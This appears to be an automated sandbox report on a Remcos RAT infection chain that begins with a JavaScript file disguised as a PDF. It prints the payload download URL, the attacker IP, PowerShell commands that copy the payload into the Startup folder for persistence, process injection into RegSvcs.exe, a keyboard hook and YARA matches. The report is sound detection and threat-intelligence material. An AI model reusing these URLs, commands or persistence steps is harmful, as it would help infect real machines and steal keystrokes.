Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245

Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: VNZVNCXKKJSF.exe, 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.631988238.0000000004981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.787409928.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000003.544975348.0000000007A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000003.422336370.0000000007A26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micros
Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: wscript.exe, 00000000.00000003.310975197.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271504600.0000018AB4BD8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.254098907.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271812767.0000018AB4BDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256263555.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264316692.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.259272464.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264517204.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264888526.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.272637988.0000018AB4BDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.269402781.0000018AB4BDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.310324374.0000018AB4BA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271642896.0000018AB4BDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.305930733.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250349589.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271078919.0000018AB4BD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.262199095.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.311408292.0000018AB4BA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.302956200.0000018AB4BA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.333468672.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265232737.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk/tt/VNZVNCXKKJSF.exe
Source: wscript.exe, 00000000.00000003.330576085.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271757510.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263690422.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268366678.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256906649.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.255312802.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.254064481.0000018AB4B6C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250150561.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.331377637.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.309049295.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264679771.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.332128622.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250282440.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.308651780.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.332656131.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250225824.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.336031702.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.310975197.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.254098907.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256263555.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264316692.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_g
Source: wscript.exe, 00000000.00000003.250114367.0000018AB4B65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk/tt/VNZVNCXKKJSF.exepo

Source: unknown

DNS traffic detected: queries for: tgc8x.tk

Source: global traffic

Source: unknown

HTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49710 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jump to behavior

Source: Systedbddfm.exe, 00000011.00000002.702879498.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe

Jump to dropped file

Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D163D8	11_2_02D163D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D1D758	11_2_02D1D758
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D15A38	11_2_02D15A38
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D11328	11_2_02D11328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D19660	11_2_02D19660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D1B750	11_2_02D1B750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D1444A	11_2_02D1444A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D14460	11_2_02D14460
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D18E58	11_2_02D18E58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D1CE20	11_2_02D1CE20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D1BC38	11_2_02D1BC38
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D86B78	11_2_02D86B78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D87FF1	11_2_02D87FF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D82780	11_2_02D82780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02DBAAD8	11_2_02DBAAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02DB0AA8	11_2_02DB0AA8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_00EE1040	17_2_00EE1040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_00EEE3B0	17_2_00EEE3B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_00EE16E1	17_2_00EE16E1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_00EE783B	17_2_00EE783B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_00EEACB0	17_2_00EEACB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_00EEBD18	17_2_00EEBD18
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_00EEE8D0	17_2_00EEE8D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_0502B7B0	17_2_0502B7B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_05022E50	17_2_05022E50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_05020040	17_2_05020040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_05023FD8	17_2_05023FD8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 17_2_05023FE8	17_2_05023FE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0497AD78	18_2_0497AD78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_07A6C5F0	18_2_07A6C5F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_07A63F40	18_2_07A63F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_07A63F40	18_2_07A63F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_07A6EB48	18_2_07A6EB48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_04977490	18_2_04977490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_04977483	18_2_04977483
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0497AE03	18_2_0497AE03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0497AE40	18_2_0497AE40

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 98%

Source: Order Specifications PDF.js

Initial sample: Strings found which are bigger than 50

Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Section loaded: mscorjit.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Section loaded: mscorjit.dll			Jump to behavior

Source: VNZVNCXKKJSF[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VNZVNCXKKJSF.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Systedbddfm.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Order Specifications PDF.js	ReversingLabs: Detection: 26%
Source: Order Specifications PDF.js	Virustotal: Detection: 25%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Specifications PDF.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe"
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
